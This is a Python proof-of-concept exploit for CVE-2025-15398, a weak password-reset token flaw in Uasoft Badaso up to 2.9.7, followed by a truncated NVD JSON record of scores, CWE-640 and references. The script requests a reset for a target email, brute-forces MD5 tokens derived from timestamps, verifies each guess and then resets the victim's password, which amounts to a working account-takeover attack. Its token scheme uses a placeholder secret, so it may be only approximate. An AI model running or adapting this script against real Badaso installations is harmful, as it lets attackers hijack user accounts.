CVE-2025-15398

import requests import hashlib import time # CVE-2025-15398 PoC - Weak Password Recovery in Uasoft Badaso # Target: Uasoft Badaso <= 2.9.7 # Vulnerability: Weak token generation in forgetPassword function TARGET_URL = "http://target-server.com" TARGET_EMAIL = "[email protected]" def generate_weak_token(username, timestamp): """ Generate weak token based on predictable parameters This demonstrates the weak token generation mechanism """ token_data = f"{username}:{timestamp}:secret_key" return hashlib.md5(token_data.encode()).hexdigest() def exploit_forget_password(): """ Step 1: Request password reset for target user """ reset_url = f"{TARGET_URL}/api/badaso-auth/forget-password" payload = { "email": TARGET_EMAIL } response = requests.post(reset_url, json=payload) print(f"[+] Password reset request sent: {response.status_code}") # Step 2: Brute force or predict the weak token current_time = int(time.time()) for i in range(100): timestamp = current_time - i * 60 # Check recent timestamps predicted_token = generate_weak_token(TARGET_EMAIL, timestamp) # Step 3: Verify token validity verify_url = f"{TARGET_URL}/api/badaso-auth/verify-token" verify_payload = { "token": predicted_token, "email": TARGET_EMAIL } verify_response = requests.post(verify_url, json=verify_payload) if verify_response.status_code == 200 and "valid" in verify_response.text: print(f"[+] Valid token found: {predicted_token}") # Step 4: Reset password with valid token reset_pass_url = f"{TARGET_URL}/api/badaso-auth/reset-password" new_password = "P@ssw0rd123!" reset_payload = { "token": predicted_token, "email": TARGET_EMAIL, "password": new_password, "password_confirmation": new_password } reset_response = requests.post(reset_pass_url, json=reset_payload) print(f"[+] Password reset response: {reset_response.status_code}") return True return False if __name__ == "__main__": exploit_forget_password()

{"cve": {"id": "CVE-2025-15398", "sourceIdentifier": "[email protected]", "published": "2025-12-31T22:15:48.833", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Uasoft badaso up to 2.9.7. Affected is the function forgetPassword of the file src/Controllers/BadasoAuthController.php of the component Token Handler. Such manipulation leads to weak password recovery. The attack can be executed remotely. This attack is characterized by high complexity. The exploitability is told to be difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en Uasoft badaso hasta 2.9.7. Afectada es la función forgetPassword del archivo src/Controllers/BadasoAuthController.php del componente Token Handler. Tal manipulación conduce a una recuperación de contraseña débil. El ataque puede ser ejecutado remotamente. Este ataque se caracteriza por alta complejidad. La explotabilidad se dice que es difícil. El exploit ha sido divulgado públicamente y puede ser usado. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-640"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uatech:badaso:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.9.7", "matchCriteriaId": "1544BAA4-D133-4F88-B10E-0E116B36A1F2"}]}]}], "references": [{"url": "https://note-hxlab.wetolink.com/share/HG1CWbb7FVnq", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://note-hxlab.wetolink.com/share/HG1CWbb7FVnq#-span--strong-step-1--t ... (truncated)